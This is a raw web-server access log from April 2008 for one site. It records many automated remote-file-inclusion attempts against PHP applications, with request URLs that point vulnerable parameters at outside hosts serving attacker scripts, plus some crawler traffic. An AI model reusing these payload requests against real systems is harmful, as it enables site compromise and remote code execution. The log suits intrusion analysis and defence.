216.22.2.74 - - [08/Apr/2008:13:51:26 -0700] "GET //ecommerce/payment/cybersource.php?path[docroot]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
216.22.2.74 - - [08/Apr/2008:13:51:27 -0700] "GET /logs//ecommerce/payment/cybersource.php?path[docroot]=http://150.35.244.118/dfm/porra/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:13:52:23 -0700] "GET //mcf.php?content=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:13:52:24 -0700] "GET /logs//mcf.php?content=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:13:53:17 -0700] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:13:53:20 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 200 7371 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
205.234.253.11 - - [08/Apr/2008:13:53:32 -0700] "GET /logs/access.log/index2.php?x=http://www.dosbrteam.com.br/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.154 - - [08/Apr/2008:13:54:24 -0700] "GET /logs/access_071207.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:54:49 -0700] "GET /logs/access_080225.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.27.193 - - [08/Apr/2008:13:54:58 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:13:55:15 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:13:55:16 -0700] "GET //skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:13:55:17 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:13:55:20 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.85.52.146 - - [08/Apr/2008:13:55:21 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:56:00 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:56:00 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:13:56:00 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:13:56:40 -0700] "GET /logs/access_080324.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:13:56:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:13:56:40 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:13:56:55 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:57:15 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:57:16 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:57:16 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:13:57:31 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:13:57:33 -0700] "GET //skin/zero_vote/error.php?dir=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
207.58.138.111 - - [08/Apr/2008:13:57:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:57:54 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:57:54 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:57:55 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:13:58:31 -0700] "GET /logs/access_080118.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:13:58:31 -0700] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:13:58:32 -0700] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.247.251.105 - - [08/Apr/2008:13:58:35 -0700] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.30.216.107 - - [08/Apr/2008:13:59:44 -0700] "GET /logs/access_080215.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
189.38.50.24 - - [08/Apr/2008:13:59:55 -0700] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:00:05 -0700] "GET //admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:00:14 -0700] "GET //admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:00:25 -0700] "GET /logs/access_080213.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:00:25 -0700] "GET /logs/access_080213.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:00:25 -0700] "GET //admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:00:25 -0700] "GET //admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:00:26 -0700] "GET /logs//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:00:26 -0700] "GET /logs//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.171.66.229 - - [08/Apr/2008:14:00:30 -0700] "GET /logs/access_080219.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [08/Apr/2008:14:00:30 -0700] "GET /logs/access_080219.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:01:17 -0700] "GET /logs/access_080213.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:01:18 -0700] "GET //admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:01:19 -0700] "GET /logs//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.213.0.1 - - [08/Apr/2008:14:01:33 -0700] "GET /logs/access_080219.log//admin/header.php?loc=http://www.priproqua.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:01:45 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
208.53.138.149 - - [08/Apr/2008:14:01:45 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.forpinkpussy.com/languages/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:03:27 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:03:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:03:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:03:38 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:03:38 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:03:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:03:39 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:03:42 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:03:43 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.67.120.48 - - [08/Apr/2008:14:03:43 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:03:44 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.209.206 - - [08/Apr/2008:14:03:47 -0700] "GET /presto/?M=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:04:41 -0700] "GET /logs/access_071031.log/protection.php?siteurl=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:04:42 -0700] "GET /protection.php?siteurl=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:04:42 -0700] "GET /logs/protection.php?siteurl=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.73.103.57 - - [08/Apr/2008:14:05:09 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://kr4p.hut2.ru/x/help.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.57.130.70 - - [08/Apr/2008:14:05:18 -0700] "GET /logs/access_080309.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.alex8212.altervista.org/L4M3R0/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:05:24 -0700] "GET /logs/access.log/%22index.php?sayfa=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:05:25 -0700] "GET /%22index.php?sayfa=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [08/Apr/2008:14:05:25 -0700] "GET /logs/%22index.php?sayfa=%22http://www.prepaidcard.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.153.252.233 - - [08/Apr/2008:14:05:50 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:06:30 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:06:36 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:06:41 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:14:06:55 -0700] "GET /logs/access_080313.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:14:06:59 -0700] "GET /logs/access.log/NuclearBB/tasks/send_queued_emails.php?root_path=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:14:07:00 -0700] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.175.18 - - [08/Apr/2008:14:07:00 -0700] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://203.71.212.3/www/modul/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.234 - - [08/Apr/2008:14:07:03 -0700] "GET /logs/access_070919.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:07:49 -0700] "GET /logs/access_080106.log/protection.php?siteurl=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:14:07:52 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:14:08:05 -0700] "GET /logs/access_080127.log//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:14:08:06 -0700] "GET //vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:14:08:06 -0700] "GET /logs//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.105.33.158 - - [08/Apr/2008:14:08:34 -0700] "GET /logs/access_080313.log/index1.php?x=http://redrumfans.com/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.205.115 - - [08/Apr/2008:14:08:36 -0700] "GET /logs/access_080308.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [08/Apr/2008:14:08:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [08/Apr/2008:14:08:36 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:08:36 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.45.142 - - [08/Apr/2008:14:08:38 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:08:45 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.137.139.73 - - [08/Apr/2008:14:08:51 -0700] "GET /logs/access_080313.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.geocities.com/nialeva/metal.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.25.151.27 - - [08/Apr/2008:14:09:02 -0700] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.ark-clan.de/vwar//images/%20%20%20%20/%20%20%20%20/%20%20%20%20/%20%20%20%20/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
85.25.151.27 - - [08/Apr/2008:14:09:02 -0700] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.ark-clan.de/vwar//images/%20%20%20%20/%20%20%20%20/%20%20%20%20/%20%20%20%20/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
66.235.216.127 - - [08/Apr/2008:14:09:05 -0700] "GET /index.php?incl=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.115 - - [08/Apr/2008:14:10:17 -0700] "GET /logs/access_080126.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ann.superprast.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.205.178.120 - - [08/Apr/2008:14:10:42 -0700] "GET /logs/access_071230.log//vwar/convert/mvcw.php?step=1&vwar_root=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:11:28 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.216.107 - - [08/Apr/2008:14:11:45 -0700] "GET /logs/access.log HTTP/1.0" 200 346665 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:13:43 -0700] "GET /logs/access.log/index.php?sayfa=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:13:45 -0700] "GET /index.php?sayfa=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:13:45 -0700] "GET /logs/access.log//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.72.191.2 - - [08/Apr/2008:14:13:46 -0700] "GET /logs/index.php?sayfa=http://www.oberreiter.com/haunz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:13:51 -0700] "GET //index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
201.212.1.227 - - [08/Apr/2008:14:13:53 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.estra7a.net/modules/Web_Links/shots/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.42.221 - - [08/Apr/2008:14:14:51 -0700] "GET //index.php?option=com_custompages&cpage=http://www.paolodune.it/.ownz/safeon.dat?????????? HTTP/1.1" 200 7371 "-" "libwww-perl/5.79" "www.dmulk.com"
213.198.89.199 - - [08/Apr/2008:14:14:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://geocities.com/wisnu_amanda/wisnu.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.65" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:15:27 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:15:33 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.18.201.175 - - [08/Apr/2008:14:15:35 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.embudu.fr/unic/vwar/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.32.162 - - [08/Apr/2008:14:15:44 -0700] "GET /logs/access_080213.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.hacking-gps.com/config1/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
